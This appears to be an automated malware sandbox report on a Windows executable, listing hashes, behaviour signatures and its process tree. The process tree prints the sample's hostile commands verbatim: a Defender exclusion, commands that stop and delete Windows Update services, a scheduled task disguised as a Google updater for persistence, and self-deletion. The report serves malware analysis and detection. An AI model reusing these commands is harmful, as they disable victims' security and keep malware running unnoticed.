Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
13/12/2022, 17:24
Static task
static1
Behavioral task
behavioral1
Sample
d0525e69e54066d5b3764acefd16a754.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
d0525e69e54066d5b3764acefd16a754.exe
Resource
win10v2004-20221111-en
General
-
Target
d0525e69e54066d5b3764acefd16a754.exe
-
Size
3.6MB
-
MD5
d0525e69e54066d5b3764acefd16a754
-
SHA1
513304e7eca83acedad4655a135a6f4c2c1f4aed
-
SHA256
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce
-
SHA512
b958797b913b1860daa2cdf4f6741835042e170fea4c4b5f3ae61432a9e24054dbcd40dbc4871d19b12d3f40d90523490caa37e6152d66850c05f18b7d738f03
-
SSDEEP
98304:vKNU8zvQiW+xPSCcgu3ebV6GDRjar2H2wKr3:avhWXrycG1jamKr3
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1896 created 1268 1896 d0525e69e54066d5b3764acefd16a754.exe 14 PID 1896 created 1268 1896 d0525e69e54066d5b3764acefd16a754.exe 14 PID 1896 created 1268 1896 d0525e69e54066d5b3764acefd16a754.exe 14 PID 1896 created 1268 1896 d0525e69e54066d5b3764acefd16a754.exe 14 PID 1896 created 1268 1896 d0525e69e54066d5b3764acefd16a754.exe 14 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts d0525e69e54066d5b3764acefd16a754.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 1172 cmd.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1588 sc.exe 1020 sc.exe 1564 sc.exe 1352 sc.exe 268 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 772 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1896 d0525e69e54066d5b3764acefd16a754.exe 1896 d0525e69e54066d5b3764acefd16a754.exe 2044 powershell.exe 1896 d0525e69e54066d5b3764acefd16a754.exe 1896 d0525e69e54066d5b3764acefd16a754.exe 1896 d0525e69e54066d5b3764acefd16a754.exe 1896 d0525e69e54066d5b3764acefd16a754.exe 1896 d0525e69e54066d5b3764acefd16a754.exe 1896 d0525e69e54066d5b3764acefd16a754.exe 1744 powershell.exe 1896 d0525e69e54066d5b3764acefd16a754.exe 1896 d0525e69e54066d5b3764acefd16a754.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2044 powershell.exe Token: SeShutdownPrivilege 1772 powercfg.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeShutdownPrivilege 920 powercfg.exe Token: SeShutdownPrivilege 1792 powercfg.exe Token: SeShutdownPrivilege 1120 powercfg.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 1504 wrote to memory of 1352 1504 cmd.exe 36 PID 1504 wrote to memory of 1352 1504 cmd.exe 36 PID 1504 wrote to memory of 1352 1504 cmd.exe 36 PID 1472 wrote to memory of 1772 1472 cmd.exe 35 PID 1472 wrote to memory of 1772 1472 cmd.exe 35 PID 1472 wrote to memory of 1772 1472 cmd.exe 35 PID 1504 wrote to memory of 268 1504 cmd.exe 37 PID 1504 wrote to memory of 268 1504 cmd.exe 37 PID 1504 wrote to memory of 268 1504 cmd.exe 37 PID 1472 wrote to memory of 920 1472 cmd.exe 38 PID 1472 wrote to memory of 920 1472 cmd.exe 38 PID 1472 wrote to memory of 920 1472 cmd.exe 38 PID 1504 wrote to memory of 1588 1504 cmd.exe 39 PID 1504 wrote to memory of 1588 1504 cmd.exe 39 PID 1504 wrote to memory of 1588 1504 cmd.exe 39 PID 1504 wrote to memory of 1020 1504 cmd.exe 40 PID 1504 wrote to memory of 1020 1504 cmd.exe 40 PID 1504 wrote to memory of 1020 1504 cmd.exe 40 PID 1472 wrote to memory of 1792 1472 cmd.exe 41 PID 1472 wrote to memory of 1792 1472 cmd.exe 41 PID 1472 wrote to memory of 1792 1472 cmd.exe 41 PID 1472 wrote to memory of 1120 1472 cmd.exe 42 PID 1472 wrote to memory of 1120 1472 cmd.exe 42 PID 1472 wrote to memory of 1120 1472 cmd.exe 42 PID 1504 wrote to memory of 1564 1504 cmd.exe 43 PID 1504 wrote to memory of 1564 1504 cmd.exe 43 PID 1504 wrote to memory of 1564 1504 cmd.exe 43 PID 1744 wrote to memory of 772 1744 powershell.exe 44 PID 1744 wrote to memory of 772 1744 powershell.exe 44 PID 1744 wrote to memory of 772 1744 powershell.exe 44 PID 1504 wrote to memory of 1072 1504 cmd.exe 45 PID 1504 wrote to memory of 1072 1504 cmd.exe 45 PID 1504 wrote to memory of 1072 1504 cmd.exe 45 PID 1504 wrote to memory of 844 1504 cmd.exe 46 PID 1504 wrote to memory of 844 1504 cmd.exe 46 PID 1504 wrote to memory of 844 1504 cmd.exe 46 PID 1504 wrote to memory of 1388 1504 cmd.exe 47 PID 1504 wrote to memory of 1388 1504 cmd.exe 47 PID 1504 wrote to memory of 1388 1504 cmd.exe 47 PID 1504 wrote to memory of 1068 1504 cmd.exe 48 PID 1504 wrote to memory of 1068 1504 cmd.exe 48 PID 1504 wrote to memory of 1068 1504 cmd.exe 48 PID 1504 wrote to memory of 1036 1504 cmd.exe 49 PID 1504 wrote to memory of 1036 1504 cmd.exe 49 PID 1504 wrote to memory of 1036 1504 cmd.exe 49 PID 1172 wrote to memory of 1484 1172 cmd.exe 52 PID 1172 wrote to memory of 1484 1172 cmd.exe 52 PID 1172 wrote to memory of 1484 1172 cmd.exe 52
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1268
-
C:\Users\Admin\AppData\Local\Temp\d0525e69e54066d5b3764acefd16a754.exe"C:\Users\Admin\AppData\Local\Temp\d0525e69e54066d5b3764acefd16a754.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
PID:1896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1352
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:268
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1588
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1020
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1564
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1072
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:844
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1388
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1068
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1036
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
PID:772
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\d0525e69e54066d5b3764acefd16a754.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1484
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5751e8c797293b43e07fd340295036231
SHA18a3c989aa15d0aa3a9b7c048cbe098ebf6c715fb
SHA256274b884114324cd143cf28e347a7808d187fa4427a3fb8a71aec342717421a39
SHA5128e67d0952fec4cc1ecb0271b84df6fe6d1b5518e254585551362e609cb313c57b8f810db673e7d14eb7bde375442530eecd281ff91f9c1c8b5968958110a8639